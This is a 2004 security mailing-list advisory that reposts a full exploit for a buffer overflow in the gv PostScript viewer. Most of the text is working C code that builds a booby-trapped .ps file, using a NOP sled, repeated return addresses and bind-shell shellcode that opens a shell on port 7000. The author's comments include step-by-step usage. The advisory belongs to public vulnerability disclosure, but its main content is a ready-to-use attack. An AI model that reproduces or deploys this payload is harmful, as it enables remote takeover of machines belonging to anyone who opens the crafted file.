[EXPL] GV PostScript Viewer Remote Buffer Overflow Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 08/15/04

  • Next message: SecuriTeam: "[EXPL] AppleFileServer Remote Command Execution Exploit" 
    To: list@securiteam.com
Date: 15 Aug 2004 15:15:39 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      GV PostScript Viewer Remote Buffer Overflow Exploit
    ------------------------------------------------------------------------

    SUMMARY

    gv allows to view and navigate through PostScript and PDF documents on an
    X display by providing a user interface for the ghostscript interpreter.
    The following exploit code is for a local buffer overflow in the gv
    postscript viewer's %%PageOrder portion of the file.

    DETAILS

    Vulnerable Systems:
     * gv 3.5.8 and prior

    Exploit:
    /*
     * gv postscript viewer exploit , infamous42md AT hotpop DOT com
     *
     * run of the mill bof. spawns a remote shell on port 7000. woopty doo. if
     * someone has been able to exploit the heap overflow in cfengine, please
    email
     * me and teach me something. after days of pain i've concluded it's not
     * possible b/c you can't manipulate the heap enough to get anything good
    in
     * front of you. please prove me wrong so i can learn.
     *
     * shouts to mitakeet
     *
     * [n00b localho outernet] netstat -ant | grep 7000
     * [n00b localho outernet] gcc -Wall -o gvown gvown.c
     * [n00b localho outernet] ./gvown 0xbffff350
     * [n00b localho outernet] ./gv h4x0ring_sacr3ts_uncuv3red.ps
     * [n00b localho outernet] netstat -ant | grep 7000
     * tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN
      
     */
    #include <stdio.h>
    #include <sys/types.h>
    #include <fcntl.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>

    #define NOP 0x90
    #define NNOPS 512
    #define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
    #define BS 0x10000
    #define RETADDR_BYTES 400
    #define PS_COMMENT "%!PS-Adobe- "
    #define OUTFILE "h4x0ring_sacr3ts_uncuv3red.ps"

    /* call them on port 7000, mine */
    char remote[] =
    "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
    "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
    "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
    "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
    "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
    "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
    "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
        

    int main(int argc, char **argv)
    {
        int len, x, fd;
        char buf[BS];
        u_long retaddr;

        if(argc < 2){
            fprintf(stderr, "Usage: %s < retaddr >\n", argv[0]);
            return EXIT_FAILURE;
        }
        sscanf(argv[1], "%lx", &retaddr);

        /* create 3vil buf */
        memset(buf, NOP, BS);
        strcpy(buf, PS_COMMENT);
        len = strlen(buf);
        for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))
            memcpy(buf+x+len, &retaddr, sizeof(retaddr));
        len += x + NNOPS;
        strcpy(buf+len, remote);
        strcat(buf+len, "\n");
        len += strlen(remote) + 1; /* + NULL */

        /* create the 3vil file */
        if( (fd = open(OUTFILE, O_RDWR|O_CREAT|O_EXCL, 0666)) < 0)
            die("open");
        
        if(write(fd, buf, len) < 0)
            die("write");

        close(fd);
        
        return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:infamous42md@hotpop.com>
    infamous42md.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] AppleFileServer Remote Command Execution Exploit"

    Relevant Pages